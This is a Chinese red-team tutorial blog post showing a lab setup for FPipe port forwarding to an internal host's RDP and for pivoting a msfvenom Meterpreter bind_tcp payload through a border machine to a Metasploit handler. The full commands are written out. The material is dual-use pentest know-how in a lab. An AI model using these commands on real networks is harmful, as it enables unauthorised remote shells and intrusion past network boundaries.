无心的梦呓 · 2019年09月27日

FPipe端口转发

目录

0x01 FPipe介绍

0x02 端口转发

0x03 msf正向上线

注:

边界机器 win08 192.168.222.175

内网机器 win7 192.168.222.137

msf机器 Ubuntu 192.168.222.177

0x01 FPipe介绍

FPipe即forward pipe,在两个端口中间建立一个管道,来实现流量的转发,一般用于内网机器不能正常上网的情况,而且不需要考虑免杀,但是必须要有边界机器,它不仅支持TCP流量的转发,还支持UDP的。

file

0x02 端口转发

将来自外部53端口的流量,通过本地的53端口转发到内网的3389端口

fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 3389 192.168.222.137

file

然后回到本地来远程连接就可以了

file

file

0x03 msf正向上线

这里我们使用bind型的payload,保证让无法正常上网的内网主机也能正常反弹shell

正常生成一个马

msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe

file

之后去边界机器执行转发

fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 53 192.168.222.137

file

在内网机器上运行我们的马

file

回到Ubuntu上进行监听

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run

file

这里的Died是生成的马有问题,之后换一下payload就可以搞定了,这个不必在意

file

根据实际情况来进行使用就ok了

文章首发公众号:无心的梦呓(wuxinmengyi)

这是一个记录红队学习、信安笔记,个人成长的公众号

扫码关注即可

file

推荐阅读
目录
极术微信服务号
关注极术微信号
实时接收点赞提醒和评论通知
安谋科技学堂公众号
关注安谋科技学堂
实时获取安谋科技及 Arm 教学资源
安谋科技招聘公众号
关注安谋科技招聘
实时获取安谋科技中国职位信息